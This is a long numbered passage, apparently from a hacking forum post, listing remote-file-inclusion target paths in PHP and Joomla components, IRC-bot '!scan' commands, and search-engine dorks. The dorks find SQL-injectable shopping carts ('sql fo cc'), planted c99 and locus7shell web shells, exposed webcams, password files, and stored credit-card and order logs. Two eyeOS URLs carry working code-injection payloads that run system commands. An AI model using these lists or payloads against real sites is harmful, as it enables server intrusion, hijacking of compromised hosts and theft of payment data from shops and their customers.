  2553. /inhalt.php?dateien[news]=
  2554. /theme/settings.php?pfad_z=
  2555. /poll.php?root_path=
  2556. /sipssys/code/box.inc.php?config[sipssys]=
  2557. /Shared/controller/text.ctrl.php?level=
  2558. /library/StageLoader.php?GLOBALS[core][module_path]=
  2559. /portal/portal.php?phpbb_root_path=
  2560. /include/lib/lib_head.php?cfgPathModule=
  2561. /modules/mail/main.php?MODULES_DIR=
  2562. /include/dtd.php?path=
  2563. /include/parser.php?path=
  2564. /upload/top.php?maindir=
  2565. /include/includes.php?include_path=
  2566. /mep/frame.php?chem=
  2567. /config/config_main.php?INC=
  2568. /admini/admin.php?INC=
  2569. /bu/bu_claro.php?bu_dir=
  2570. /bu/bu_parse.php?bu_dir=
  2571. /WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=
  2572. /modules/mx_pafiledb/pafiledb/includes/pafiledb_constants.php?module_root_path=
  2573. /ajax_request.php?include_path=
  2574. /form.func.php?GLOBALS[PTH][classes]=
  2575. /modules/character_roster/include.php?mod_root=
  2576. /gallery/displayCategory.php?basepath=
  2577. /ataturk.php?page=
  2578. /b2verifauth.php?index=
  2579. /index.php?lang=
  2580. /common.inc.php?CFG[localedir]=
  2581. /music/buycd.php?HTTP_DOCUMENT_ROOT=
  2582. /include/index.inc.php?incpath=
  2583. /include/header_admin.inc.php?incpath=
  2584. /include/menu_u.inc.php?incpath=
  2585. /include/commrecc.inc.php?action=recommend&incpath=
  2586. /include/do_reg.inc.php?incpath=?
  2587. /protection.php?action=logout&siteurl=
  2588. /includes/profilcp_constants.php?module_root_path=
  2589. /activate.php?language=conf&footerpage=
  2590. /owllib/memory/OWLMemoryProperty.php?OWLLIB_ROOT=
  2591. /includes/poll.php?GlobalSettings[templatesDirectory]=
  2592. /phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=
  2593. /phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=
  2594. /act/act_check_access.php?apx_root_path=
  2595. /dsp/dsp_form_boo
  2596. home.php?qry=
  2597. blank.php?ki=
  2598. path.php?action=
  2599. include.php?nivel=
  2600. enter.php?mod=
  2601. press.php?*root*=
  2602. page.php?cmd=
  2603. template.php?second=
  2604. index.php?filepath=
  2605. page.php?addr=
  2606. info.php?j=
  2607. file.php?ir=
  2608. enter.php?pname=
  2609. gallery.php?phpbb_root_path=
  2610. home.php?sp=
  2611. !scan /_theme/breadcrumb.php?rootBase= “! Hide Your Friends & Comments”
  2612. !scan /?abs_path= “To perform an advanced search, select from the options below.”
  2613. !scan home.php?page= “home.php?page=”
  2614. !scan index.php?show= inurl:”index.php?show=” Warning: include() [function.include]: Failed opening
  2615. !scan index.php?go= inurl:”index.php?go=” Warning: include() [function.include]: Failed opening
  2616. !scan index.php?x= inurl:”index.php?x=” Warning: include() [function.include]: Failed opening
  2617. !scan index.php?por= inurl:”index.php?por=” Warning: include() [function.include]: Failed opening
  2618. stats/modules/My_eGallery/index.php?basepath=
  2619. index.cgiupgrade_album.php?GALLERY_BASEDIR=
  2620. index.php?mosConfig_absolute_path=
  2621. vnranger1970 jest offline Add to vnranger1970’s Reputation Report Post Reply With Quote
  2622. inurl:/includes/include_onde.php?include_file=
  2623. /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
  2624. /tutorials/print.php?page=
  2625. /index1.php?nav=
  2626. allinurl:NphpBB2 site:.org
  2627. /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
  2628. /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=
  2629. allinurl:main.php?pagina=
  2630. /phplivehelper/initiate.php?abs_path=
  2631. allinurl:/forum/
  2632. “Powered by iUser”
  2633. /help_text_vars.php?dir&PGV_BASE_DIRECTORY=
  2634. allinurl:/folder.php?id=
  2635. inurl:”index2.php?DoAction=”
  2636. inurl:”pages.php?page=”
  2637. inurl:”index2.php?ascii_seite=”
  2638. dork: “Powered By ScozNews”
  2639. inurl:/hcl/inc/pipe.php?HCL_path=
  2640. inurl:/gnu3/index.php?doc=
  2641. inurl:/forum/install.php?phpbb_root_dir=
  2642. inurl:*.php?catch=
  2643. inurl:*.php?pg=
  2644. /Gallery/displayCategory.php?basepath=
  2645. /index.php?inter_url=
  2646. 6. allinurl:ihm.php?p=
  2647. 8. allinurl:/modules.php?name=allmyguests
  2648. 9. allinurl:/Popper/index.php?
  2649. 16. allinurl:ihm.php?p=*
  2650. 17. allinurl:forums.html
  2651. 18. allinurl:/default.php?page=home
  2652. 19. allinurl:/folder.php?id=
  2653. 23. allinurlp:hplivehelper
  2654. 24. allinurlp:hpnuke
  2655. 25. key word : “powered by Fantastic News v2.1.2”
  2656. 32. allinurl: “static.php?load=”
  2657. 33. keyworld : /phpcoin/login.php
  2658. inurl:”index.php?screen=”
  2659. /?mosConfig_absolute_path=
  2660. /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
  2661. /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
  2662. /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
  2663. /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=
  2664. /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
  2665. /administrator/components/com_color/admin.color.php?mosConfig_live_site=
  2666. /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
  2667. /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
  2668. /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=
  2669. /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=
  2670. /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
  2671. /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolu te_path=
  2672. /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
  2673. /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
  2674. /administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=
  2675. /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=
  2676. /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=
  2677. /administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
  2678. /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
  2679. /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
  2680. /administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
  2681. /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
  2682. /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
  2683. /administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
  2684. /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
  2685. /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
  2686. /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
  2687. /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
  2688. /akocomments.php?mosConfig_absolute_path=
  2689. /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=
  2690. /component/com_events/includes/comutils.php?mosConfig_absolute_path=
  2691. /component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=
  2692. /components/calendar/com_calendar.php?absolute_path=
  2693. /components/com_calendar.php?absolute_path=
  2694. /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
  2695. /components/com_galleria/galleria.html.php?mosConfig_absolute_path=
  2696. /components/com_jcs/jcs.function.php?mosConfig_absolute_path=
  2697. /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=
  2698. /components/com_jombib/BibTex.php?mosConfig_absolute_path=
  2699. /components/com_mambowiki/MamboLogin.php?IP=
  2700. /components/com_minibb.php?absolute_path=
  2701. /components/com_moodle/moodle.php?mosConfig_absolute_path=
  2702. /components/com_mosmedia/media.divs.php?mosConfig_absolute_path=
  2703. /components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
  2704. /components/com_mospray/scripts/admin.php?basedir=
  2705. /components/com_mp3_allopass/allopass.php?mosConfig_live_site=
  2706. /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=
  2707. /components/com_performs/performs.php?mosConfig_absolute_path=
  2708. /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
  2709. /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=
  2710. /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=
  2711. /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=
  2712. /components/minibb/index.php?absolute_path=
  2713. /database.php?mosConfig_absolute_path=
  2714. /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=
  2715. /includes/adminAvatars.php?GlobalSettings[templatesDirectory]=
  2716. /includes/adminSmileys.php?GlobalSettings[templatesDirectory]=
  2717. /includes/functions_cms.php?phpbb_root_path=
  2718. /includes/move.php?GlobalSettings[templatesDirectory]=
  2719. /index.php?option=com_bayesiannaivefilter&Itemid=&m osConfig_absolute_path=
  2720. /index.php?option=com_datsogallery&&Itemid=&mosConf ig_absolute_path=
  2721. /index.php?option=com_flyspray&Itemid=&mosConfig_ab solute_path=
  2722. /index.php?option=com_frontpage&Itemid=&mosConfig_a bsolute_path=
  2723. /index.php?option=com_jreactions&Itemid=&mosConfig_ absolute_path=
  2724. /index.php?option=com_kochsuite&Itemid=&mosConfig_a bsolute_path=
  2725. /index.php?option=com_linkdirectory&Itemid=&mosConf ig_absolute_path=
  2726. /index.php?option=com_lmo&Itemid=&mosConfig_absolut e_path=
  2727. /index.php?option=com_log&Itemid=&mosConfig_absolut e_path=
  2728. /index.php?option=com_lurm_constructor&Itemid=&mosC onfig_absolute_path=
  2729. /index.php?option=com_magazine&Itemid=&mosConfig_ab solute_path=
  2730. /index.php?option=com_mambatstaff&Itemid=&mosConfig _absolute_path=
  2731. /index.php?option=com_mambowiki&Itemid=&mosConfig_a bsolute_path=
  2732. /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=
  2733. /mod_cbsms_messages.php?mosConfig_absolute_path=
  2734. /modules/calendar/mod_calendar.php?absolute_path=
  2735. /modules/mod_as_category.php?mosConfig_absolute_path=
  2736. /modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=
  2737. /modules/mod_header_image.php?mosConfig_absolute_path=
  2738. /modules/mod_weather.php?absolute_path=
  2739. /templates/be2004-2/index.php?mosConfig_absolute_path=
  2740. /libraries/pcl/pcltar.php?g_pcltar_lib_dir=
  2741. sql fo cc
  2742. “.asp?bookID=”
  2743. “.asp?category_list=”
  2744. “.asp?cid=”
  2745. “.asp?code_no=”
  2746. “.asp?designer=”
  2747. “.asp?intProdId=”
  2748. “.asp?item=”
  2749. “.asp?itemID=”
  2750. “.asp?pid=”
  2751. “.asp?product_id=”
  2752. “about.asp?cartID=”
  2753. “accinfo.asp?cartId=”
  2754. “acclogin.asp?cartID=”
  2755. “addcart.asp?”
  2756. “add-to-cart.asp?ID=”
  2757. “advSearch_h.asp?idCategory=”
  2758. “affiliate.asp?ID=”
  2759. “aspx?PageID”
  2760. “Book.asp?bookID=”
  2761. “buy.asp?bookid=”
  2762. “bycategory.asp?id=”
  2763. “cart_additem.asp?id=”
  2764. “catalog_main.asp?catid=”
  2765. “category.asp”
  2766. “category_list.asp?id=”
  2767. “checkout.asp?cartid=”
  2768. “comersus_listCategoriesAndProducts.asp?idCategory=”
  2769. “comersus_optEmailToFriendForm.asp?idProduct=”
  2770. “details.asp?BookID=”
  2771. “details.asp?Service_ID=”
  2772. “downloadTrial.asp?intProdID=”
  2773. “emailToFriend.asp?idProduct=”
  2774. “faq.asp?cartID=”
  2775. “feedback.asp?title=”
  2776. “freedownload.asp?bookid=”
  2777. “fullDisplay.asp?item=”
  2778. “GetItems.asp?itemid=”
  2779. “home.asp?id=”
  2780. “index.asp?ID=”
  2781. “item.asp?prodtype=”
  2782. “learnmore.asp?cartID=”
  2783. “order.asp?BookID=”
  2784. “prodetails.asp?prodid=”
  2785. “products.asp?ID=”
  2786. “products.asp?keyword=”
  2787. “products_category.asp?CategoryID=”
  2788. “products_detail.asp?CategoryID=”
  2789. “shopaddtocart.asp”
  2790. “shopaddtocart.asp?catalogid=”
  2791. “shopdisplayproducts.asp”
  2792. “shopping_basket.asp?cartID=”
  2793. “shopprojectlogin.asp”
  2794. “shopquery.asp?catalogid=”
  2795. “shopremoveitem.asp?cartid=”
  2796. “shopreviewadd.asp?id=”
  2797. “shopthanks.asp”
  2798. “shopwelcome.asp?title=”
  2799. “StoreRedirect.asp?ID=”
  2800. “tuangou.asp?bookid=”
  2801. “view_detail.asp?ID=”
  2802. “viewitem.asp?recor=”
  2803. “ViewProduct.asp?misc=”
  2804. “WsPages.asp?ID=”
  2805. c99 dorks (fell free to change name of the shell for more results) TZ-
  2806. inurl:c99.php uid=0(root)
  2807. root c99.php
  2808. “Captain Crunch Security Team” inurl:c99
  2809. download c99.php
  2810. allinurl: c99.php
  2811. inurl:”c99.php” c99shell
  2812. c99shell powered by admin
  2813. inurl:”/c99.php”
  2814. c99 shell v.1.0 (roots)
  2815. allintitle: “c99shell”
  2816. inurl:”c99.php
  2817. inurl:”/c99.php
  2818. inurl:c99.php?
  2819. inurl:/c99.php+uname
  2820. allinurl:”c99.php”
  2821. allinurl:c99.php
  2822. allinurl:c99.php?
  2823. “inurl:c99..php”
  2824. c99shell [file on secure ok ]?
  2825. “c99.php” filetype:php
  2826. allinurl:.c99.php
  2827. “inurl:c99.php”
  2828. c99. PHP-code Feedback Self remove
  2829. inurl:c99.php
  2830. c99shell
  2831. intitle:C99Shell v. 1.0 pre-release +uname
  2832. safe-mode: off (not secure) drwxrwxrwx c99shell
  2833. inurl:/c99.php
  2834. c99.php download
  2835. inurl:”c99.php?”
  2836. files/c99.php
  2837. c99shell filetype:php -echo
  2838. inurl:”c99.php”
  2839. inurl:”/c99.php” intitle:”C99shell”
  2840. C99Shell v. 1.0 pre-release build #5
  2841. –[ c99shell v. 1.0 pre-release build #16
  2842. c99shell linux infong
  2843. C99Shell v. 1.0 pre-release build
  2844. !C99Shell v. 1.0 beta!
  2845. !c99shell v. 1+Safe-mode: OFF (not secure)
  2846. “C99Shell v. 1.0 pre-release build ”
  2847. intitle:c99shell +filetype:php
  2848. “Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  2849. intitle:!C99Shell v. 1.0 pre-release build #16! root
  2850. intitle:c99shell intext:uname
  2851. allintext:C99Shell v. 1.0 pre-release build #12
  2852. –[ c99shell v. 1.0 pre-release build #15 | Powered by ]–
  2853. allinurl: “c99.php”
  2854. “c99shell v 1.0”
  2855. ftp apache inurl:c99.php
  2856. c99shell+v.+1.0 16
  2857. C99Shell v. 1.0 pre-release build #16 download
  2858. intitle:c99shell “Software: Apache”
  2859. allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  2860. c99shell v. 1.0 release security
  2861. c99shell v. 1.0 pre-release build
  2862. C99Shell v. 1.3
  2863. powered by Captain Crunch Security Team
  2864. C99Shell v. 1.0 pre-release build #16
  2865. c99shell[on file]ok
  2866. c99shell[file on ]ok
  2867. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
  2868. =C99Shell v. 1.0 pre-release
  2869. c99shell v. pre-release build
  2870. inurl:c99.php c99 shell
  2871. !C99Shell v. 1.0 pre-release build #5!
  2872. intitle:”c99shell” filetype:php root
  2873. intitle:”c99shell” Linux infong 2.4
  2874. C99Shell v. 1.0 beta !
  2875. C99Shell v. 1.0 pre-release build #
  2876. “C99Shell v. 1.0 pre”
  2877. inurl:/c99.php?
  2878. intitle:C99Shell pre-release
  2879. C99Shell v. 1.0 pre-release build #16 administrator
  2880. C99Shell v. 1.0 pre-release build #12
  2881. c99shell v.1.0
  2882. “c99shell v. 1.0 pre-release build”
  2883. inurl:”c99.php” filetype:php
  2884. “c99shell v. 1.0 ”
  2885. ok c99.php
  2886. c99shell v. 1.0 pre-release build #16 |
  2887. allinurl:/c99.php
  2888. C99Shell v. 1.0 pre-release
  2889. inurl:c99.php ext:php
  2890. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout”
  2891. C99Shell v. 1.0 pre-release build #16 software apache
  2892. allintitle: C99shell filetype:php
  2893. C99Shell v. 1.0 pre-release build #16!
  2894. “c99shell v. 1.0 pre-release”
  2895. c99shell v. 1.0 pre-release build #5
  2896. allinurl:”c99.php” filetype:php
  2897. !C99Shell v. 1.0 pre-release build #16!
  2898. c99shell v. 1.0
  2899. –[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]–
  2900. c99shell +uname
  2901. c99shell php + uname
  2902. C99Shell v.1.0 pre-release
  2903. intitle:c99shell filetype:php
  2904. “Encoder Tools Proc. FTP brute”
  2905. “c99″ filetype:php intext:”Safe-Mode: OFF”
  2906. c99shell v. 1.0 pre
  2907. intitle:c99shell uname -bbpress
  2908. intitle:”index.of” c99.php
  2909. inurl:admin/files/
  2910. intitle:”index of /” “c99.php”
  2911. intitle:”index of” intext:c99.php
  2912. intitle:”index of” + c99.php
  2913. intitle:index/of file c99.php
  2914. index of /admin/files/
  2915. c99.php “intitle:Index of ”
  2916. intitle:index.of c99.php
  2917. img/c99.php
  2918. img.c99.php
  2919. intitle:”Index of/”+c99.php
  2920. “index of /” c99.php
  2921. c99.php
  2922. intitle:”Index of” c99.php
  2923. “index of” c99.php
  2924. “Index of/”+c99.php
  2925. powered by captain crunch security team
  2926. shell
  2927. kuwait hacker
  2928. php safe-mode bypass (list directories):
  2929. startpar -f
  2930. hs_kuwait.php
  2931. lejeune interpolate
  2932. name asc. size · modify · owner/group · perms action
  2933. shell c99 ccteam.r
  2934. .phpact=f shell
  2935. 00007458 zip
  2936. allintext:”safe-mode: off (not secure)
  2937. allintitle: c99memoryl
  2938. allinurl:upload3.php
  2939. astro acrobat
  2940. basel stellar library
  2941. c99memory
  2942. c99memoryl
  2943. c99shell v. 1.0 pre-release build #16
  2944. class-efem
  2945. efemerides del 22 de abril
  2946. encoder bind proc. ftp brute sec. sql php-
  2947. encoder bind proc. ftp brute sec. sql php-code feedback
  2948. encoder bind proc. ftp brute sec. sql php-code update feedback
  2949. encoder tools proc. ftp brute sec. sql php-code update feedback
  2950. filetype:php shell
  2951. foreach (array(sortsql_sort) as $v)
  2952. i.s.s.w team …
  2953. inurl:ftpquickbrute
  2954. inurl:php drwxrwxr-x ftp brute sql
  2955. lejeune interpolation
  2956. lejuene interpolate
  2957. lmgrd_start 47
  2958. mysqld usage of cpu suse httpd2-prefork
  2959. php echo getenv
  2960. php4 “registered stream socket transports”
  2961. powered by captain crunch filetype:php
  2962. powered by captain crunch security team drwxrwxrwx
  2963. powered by captain crunch security team | [Only Registered Users Can See LinksClick Here To Register] |
  2964. safe mode : off (not secure)
  2965. safe-mode:
  2966. select action/file-type:
  2967. software make dir upload file safe-mode
  2968. uid=30(wwwrun) gid=8(www)
  2969. locus shell
  2970. locus7shell
  2971. intitle:locus7shell
  2972. locus7shell filetype:php
  2973. locus7shell uname
  2974. allintitle: locus7shell
  2975. – locus7shell
  2976. intitle:- locus7shell
  2977. x2300 locus7shell
  2978. –[ x2300 locus7shell v. 1.0a beta modded by #!physx^ |
  2979. allintitle:- locus7shell
  2980. intitle: – locus7shell
  2981. safe-mode: off (not secure)
  2982. locus7shell 2008
  2983. shell x2300 locus7shell
  2984. .br – locus7shell
  2985. .us/images/0/588/mo_656_656.swf
  2986. allintext:–[ x2300 locus7shell v. modded by #!physx^
  2987. allintitle: – locus7shell
  2988. allintitle: locus7shell ext:php
  2989. allintitle:locus7shell
  2990. allintitle:locus7shell filetype:php
  2991. free locus7shell
  2992. ftp brute sec. sql php-code
  2993. inurl:act=sql
  2994. locus7s off secure
  2995. locus7s shell
  2996. locus7shell apache
  2997. locus7shell edition 2008
  2998. locus7shell filetype: ‘php’
  2999. locus7shell index:php
  3000. locus7shell linux 2008
  3001. locus7shell modified
  3002. safe-mode: off (not secure) drwxrwxrwx locus7shell
  3003. %%% locus7shell
  3004. – locus7shell windows
  3005. –[ x2300 locus7shell v. 1.0a beta modded by #!physx^ | [Only Registered Users Can See LinksClick Here To Register]
  3006. –[ x2300 locus7shell v. modded by #!physx^ | [Only Registered Users Can See LinksClick Here To Register] |
  3007. –[ x2300 locus7shell v.1.0a beta modded by #!physx^ | [Only Registered Users Can See LinksClick Here To Register]
  3008. /locus7shell/
  3009. [enumerate] [encoder] [tools] [proc.] [ftp brute] [sec.] [sql]
  3010. allintext: locus7shell v. 1.0a beta
  3011. allintext:”safe-mode: off (not secure)”
  3012. allintitle: \locus7shell\
  3013. allinurl: .phpact=ls
  3014. apache aix aixthread_scope
  3015. ar ba locus7shell
  3016. basel
  3017. basel 3.1 library
  3018. basel interpolation
  3019. basel interpolation engine
  3020. basel spectra
  3021. encoder bind proc. ftp brute sec. sql php-code feedback self re
  3022. filetype locus7shell
  3023. interpolation engine
  3024. intext:” safe-mode:off (not secure)”
  3025. intitle:- locus7shell’
  3026. intitle:c99memoryl inurl:.php
  3027. intitle:locus7shell by filetype:php
  3028. intitle:locus7shell drwxr-xr-x
  3029. inurl:.phpact=ls
  3030. inurl:act intext:full hexdump
  3031. license.dat idl server bypass
  3032. locus7s uname
  3033. locus7shell 2.0
  3034. locus7shell [file on secure ok ] drwxrwxrwx
  3035. locus7shell intext:x2300 intext:milw0rm.it enumerate uname
  3036. locus7shell inurl:php
  3037. locus7shell linux
  3038. locus7shell linux 2006
  3039. locus7shell safe-mode: off (not secure) drwxrwxrwx
  3040. locus7shell self remove drwxrwxrwx
  3041. locus7shell v. 1.0
  3042. locus7shell windows 2008
  3043. locus7shell-
  3044. make dir make file ok read files locus7shell
  3045. modded locus7shell
  3046. php safe-mode bypass (list directories)
  3047. php safe-mode bypass (read file)
  3048. php safe-mode bypass (read files)
  3049. safe-mode: apache uname -a: linux filetype:php
  3050. safe-mode: off (not secure) / tmp/ drwxrwxrwx
  3051. safe-mode: off (not secure) locus7shell
  3052. safe_mode: off drwxr-xr-x locus7shell
  3053. software: safe-mode: off (not secure) your ip: – server ip: [ft
  3054. suhosin 5.1.2
  3055. sybase aixthread_scope
  3056. uploads/ drwxrwxrwx
  3057. warning kernel may be alerted using higher levels safe mode
  3058. x2300 locus7shell download
  3059. x2300 locus7shell modified by #!physx^
  3060. x2300 locus7shell v. 1.0a
  3061. x2300 locus7shell v. 1.0a beta
  3062. Camera dorks
  3063. inurl:”viewerframe?mode=motion
  3064. intitle:”Live view ? – Axis
  3065. “robot.txt” “disallow:” filetype:txt
  3066. inurl:_vti_pvt “service.pwd”
  3067. inurl:”phphotoalbum/upload”
  3068. “vnc desktop” inurl:5800
  3069. inurl:”port_255″ -htm
  3070. intitle:phpMyAdmin “Welcome to phpMyAdmin ***” “running on * as root@*”
  3071. “intitle:inidex of” song.Mp3
  3072. inurl:”axis-cgi/mjpg”
  3073. inurl:”/view/index.shtml”
  3074. intitle:liveapplet inurl:lvappl
  3075. intitle:”snc-rz30 home”
  3076. intitle:WJ-NT104 Main”
  3077. intitle:index of ws_ftp.ini
  3078. intitle:”index of” passwd passwd.bak
  3079. inurl:”viewerframe?mode=refresh”
  3080. “Index of/admin”
  3081. “Index of/” +passwd
  3082. “Index of/” +password.txt
  3083. administrators.pwd.index
  3084. authors.pwd.index
  3085. filetype:config web
  3086. allintitle: “index of/root”
  3087. allintitle: restricted filetype :mail
  3088. inurl:admin filetype:db
  3089. inurl:”auth_user_file.txt”
  3090. inurl:”wwwroot/*.”
  3091. top secret site:mil
  3092. confidential site:mil
  3093. allinurl: winnt/system/ (get cmd.exe)
  3094. allinurl:/bash_history
  3095. intitle:”Index of” .bash_history
  3096. intitle:”index of” passwd
  3097. intitle:”index of” people.lst
  3098. intitle:”index of” spwd
  3099. intitle:”index of” master.passwd
  3100. intitle:”index of” htpasswd
  3101. intitle:”index of” user_carts OR user_cart
  3102. –ALTERNATIVE INPUTS–
  3103. service.pwd
  3104. shtml.exe
  3105. fpcount.exe
  3106. showcode.asp
  3107. sendmail.cfm
  3108. getFile.cfm
  3109. imagemap.exe
  3110. test.bat
  3111. msadcs.dll
  3112. htimage.exe
  3113. counter.exe
  3114. browser.inc
  3115. default.aspdvwssr.dll
  3116. index.jsp
  3117. SessionServlet
  3118. shtml.dll
  3119. shop.cgi
  3120. finger
  3121. jj
  3122. webdist.cgi
  3123. htmlscript
  3124. perl.exe
  3125. campas
  3126. glimpse
  3127. AT-generate.cgi
  3128. filemail.pl
  3129. maillist.pl
  3130. infowww
  3131. survey.cgi
  3132. classifieds.cgi
  3133. wrap
  3134. edit.pl
  3135. test.cgi
  3136. guestbook.cgi
  3137. guestbook.pl
  3138. cachemgr.cgi
  3139. perlshop.cgi
  3140. query
  3141. w-msql
  3142. plusmail
  3143. htsearch
  3144. formmail.cgi
  3145. allmanage.pl
  3146. cvsweb.cgi
  3147. subscribe.pl
  3148. acid_main.php
  3149. log.htm
  3150. log.html
  3151. logfile
  3152. logfile.htm
  3153. logfile.txt
  3154. logger.html
  3155. stats.txt
  3156. webaccess.htm
  3157. source.asp
  3158. YaBB.pl
  3159. mailform.pl
  3160. build.cgi
  3161. show
  3162. global.inc
  3163. ad.cgi
  3164. index.html~
  3165. index.html.bak
  3166. mysql.class
  3167. help.cgi
  3168. /robots.txt
  3169. /admin.mdb
  3170. /stats/styles.css
  3171. /statshelp.htm
  3172. /shopping.mdb
  3173. /photos/protest/kingmarch_.html
  3174. /cgi-bin/glocation.cgi
  3175. /cgi-bin/whois.cgi
  3176. /cgi-bin/calendar.pl
  3177. /cgibin/styles.css
  3178. /stats/www.newbauersflowers.com/stats/-refers.htm
  3179. /WebShop/templates/styles.css
  3180. /stats/shopping.mdb
  3181. /cgi-bin/mailform.cgi
  3182. /chevy
  3183. /cgi-bin/servinfo.cgi
  3184. /acart_.mdb
  3185. /chevy/
  3186. /stats/www.savethemall.net/stats/-refers.htm
  3187. /cgi/recon.cgi
  3188. /ibill/glocation.cgi
  3189. /apps_trial.htm
  3190. /cgi-bin/DCShop/Orders/styles.css
  3191. /cgi-bin/mastergate/add.cgi
  3192. /cgi-bin/openjournal.cgi
  3193. /cgi-bin/mastergate/count.cgi
  3194. /cgibin/mailform.cgi
  3195. /cgibin/mastergate/count.cgi
  3196. /cgibin/harvestor.cgi
  3197. /WebShop
  3198. /shopdisplaycategories.asp
  3199. /cgi-bill/revshare/joinpage.cgi
  3200. /data/verotellog.txt
  3201. /cgi/MasterGate/count.cgi
  3202. /jump/rsn.tmus/skybox;sz=x;segment=all;resor=jackson;state= WY;sect=home;tile=;ord=
  3203. /WebShop/templates/cc.txt
  3204. /cgi-bin/count.cgi
  3205. /cgi-local/DCShop/auth_data/auth_user_file.txt
  3206. /cgi-bin/store/Log_files/your_order.log
  3207. store/log_files/your_order.log
  3208. /cgi-bin/DCShop/Orders/orders.txt
  3209. /vpasp/shopdbtest.asp
  3210. /orders/checks.txt
  3211. /WebShop/logs
  3212. /scripts/cart35.exe
  3213. /cvv.txt
  3214. /cart/shopdbtest.asp
  3215. /cgi-win/cart.pl
  3216. /shopdbtest.asp/WebShop/logs/cc.txt
  3217. /cgi-local/cart.pl
  3218. /PDG_Cart/order.log
  3219. /config/datasources/expire.mdb
  3220. /orders/orders.txt
  3221. /cgis/cart.pl
  3222. /cgi/cart.pl
  3223. /Admin_files/order.log
  3224. /orders/mountain.cfg
  3225. /scripts/cart.pl
  3226. /htbin/cart.pl
  3227. /shoponline/fpdb/shop.mdb
  3228. /PDG_Cart/shopper.conf
  3229. /shopping/database/metacart.mdb
  3230. /cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
  3231. /cgi-bin/orders.txt
  3232. /cgi-bin/store/Admin_files/your_order.log
  3233. /test/test.txt
  3234. /cgibin/shop/orders/orders.txt
  3235. /shopadmin.asp
  3236. /cgi-bin/PDG_cart/card.txt
  3237. /shopper.cgi?preadd=action&key=PROFA&template=order.log
  3238. /store/shopdbtest.asp
  3239. /log_files/your_order.log
  3240. /cgibin/DCShop/auth_data/auth_user_file.txt
  3241. /SHOP/shopadmin.asp
  3242. /vpshop/shopadmin.asp
  3243. /orders/order.log
  3244. /orders/db/zzzbizorders.log.html
  3245. /orders/import.txt
  3246. /htbin/DCShop/auth_data/auth_user_file.txt
  3247. /admin/html_lib.pl
  3248. /cgi-bin/%shopper.cgi?preadd=action&key=PROFA&template=myorder.txt
  3249. /cgi-bin/DCShop/auth_data/auth_user_file.txt
  3250. /bin/shop/auth_data/auth_user_file.txt
  3251. /mysql/shopping.mdb
  3252. /trafficlog
  3253. /store/cgi-bin/Admin_files/expire.mdb
  3254. /derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log
  3255. /cgi-bin/mall.cgi
  3256. /cgi-win/DCShop/auth_data/auth_user_file.txt
  3257. /store/commerce.cgi
  3258. /scripts/shop/orders/orders.txt
  3259. /product/shopping.mdb
  3260. /super_stats/access_logs
